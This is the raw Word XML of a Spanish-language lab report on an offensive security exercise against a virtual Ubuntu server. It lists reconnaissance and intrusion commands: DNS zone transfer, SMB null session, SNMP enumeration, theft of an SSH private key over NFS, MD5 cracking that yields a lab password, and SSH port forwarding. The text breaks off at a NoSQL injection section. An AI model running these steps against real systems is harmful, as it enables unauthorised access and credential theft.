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3.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId29.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e54ada421451fa63ff09620d5da17c52368917c"/>
      <w:r>
        <w:t xml:space="preserve">Reporte Técnico Consolidado: Auditoría de Seguridad, Explotación y Post-Explotación en Laboratorio Virtual</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Autor / Operador:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Lozano</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Rol:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ingeniero DevSecOps / Auditor de Seguridad Ofensiva</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Entorno de Laboratorio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Red NAT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cetipracticas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.0/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Máquina Atacante:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Kali Linux GUI (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Máquina Objetivo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ubuntu Server 22.04 LTS (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.101</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fecha de Ejecución:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Octubre 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_f1cb4ae57cba27321cb981dc74d1d69c28777b8"/>
      <w:r>
        <w:t xml:space="preserve">1. Contexto Previo: Cadena de Intrusión Inicial (Prácticas 1 a 6)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El presente reporte documenta la fase avanzada de explotación, post-explotación, transferencia de artefactos y consolidación de persistencia realizada en el laboratorio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cetipracticas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La intrusión previa sentó las bases para el acceso inicial al servidor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ubuntuServer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.101</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reconocimiento y Descubrimiento de Red (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El escaneo de red (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sn 192.168.1.0/24</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) localizó la máquina objetivo en la dirección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.1.101</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con múltiples servicios expuestos (FTP 21, SSH 22, SMTP 25, DNS 53, HTTP 80, RPC/NFS 111/2049, SMB 139/445, SNMP 161, HTTP-Alt 8080).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Transferencia de Zona DNS AXFR (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">dig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Mediante la consulta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">dig @192.168.1.101 cetilab.local -t axfr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, el servidor DNS expuso 11 subdominios internos críticos:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app.cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">db-mongo.cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">db-mysql.cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">files.cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp.cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mail.cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nfs.cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ns1.cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">snmp.cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh.cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">www.cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Auditoría Web y Enumeración de Virtual Hosts (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">&amp; Burp Suite)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El escaneo de VHOSTs con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">gobuster</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">validó el alojamiento del portal interno en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">app.cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La interceptación HTTP con Burp Suite identificó parámetros vulnerables a inyección SQL en la consulta de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/archivos_ti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Acceso a Recursos Compartidos SMB (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">smbmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cifs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Se utilizó</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">smbmap -H cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para detectar el recurso</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">archivos_ti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">accesible en modo solo lectura mediante una</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">null session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El montaje en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/archivoCompartido</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">reveló dos archivos de texto:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nota_desarrollo.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(confirmando el servicio FTP) y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">respaldo_credenciales.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con el hash MD5 de la contraseña del usuario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ftpuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reconocimiento SNMP v2c (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La enumeración SNMP con comunidad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v 2c -c public cetilab.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) expuso en el campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sysLocation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">NFS_EXPORT: /srv/nfs/respaldos_ti | TARGET_USER: developer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1001"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exfiltración de Llave SSH por NFS y Crackeo MD5 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">john</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Se montó el recurso NFS en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/mnt/respaldos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mount -t nfs cetilab.local:/srv/nfs/respaldos_ti /mnt/respaldos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), localizando la llave privada</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">developer.key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Tras asignarle permisos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod 600</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se utilizó para acceder como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">developer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">vía SSH. Paralelamente, con John the Ripper y la máscara</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ceti?d?d?d?d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se crackeó el hash MD5 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fcd065c1541dc1f64cce023e9f9e4900</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), obteniendo la clave</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ceti2245</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_f2fd3054003035a0f91978601ac2bfdc6f2aac2"/>
      <w:r>
        <w:t xml:space="preserve">2. Práctica 1: Local Port Forwarding e Inyección NoSQL (NoSQLi)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_89a1cea7ba2b88c66621cd7def16a083238381b"/>
      <w:r>
        <w:t xml:space="preserve">2.1 Concepto y Justificación Técnica</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Determinados servicios y paneles de administración internos (como instancias de bases de datos o paneles de microservicios) están configurados para escuchar exclusivamente en la interfaz de bucle invertido (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) de la máquina objetivo, impidiendo el acceso directo desde el segmento de red externo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para acceder al servicio web interno que opera en el puerto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">5000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ubuntuServer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, se estableció un túnel SSH con redirección de puerto local (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Local Port Forwarding</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/kali/developer.key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5000:127.0.0.1:5000 developer@192.168.1.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Con este túnel, cualquier petición enviada a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://127.0.0.1:5000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en la máquina atacante Kali Linux es cifrada y encapsulada por SSH hacia el servidor objetivo, que la entrega localmente al proceso en escucha.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_f447c29a84889dd35defc938936b895ba36b4fa"/>
      <w:r>
        <w:t xml:space="preserve">2.2 Explotación de la Vulnerabilidad NoSQLi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Al acceder a</w:t>
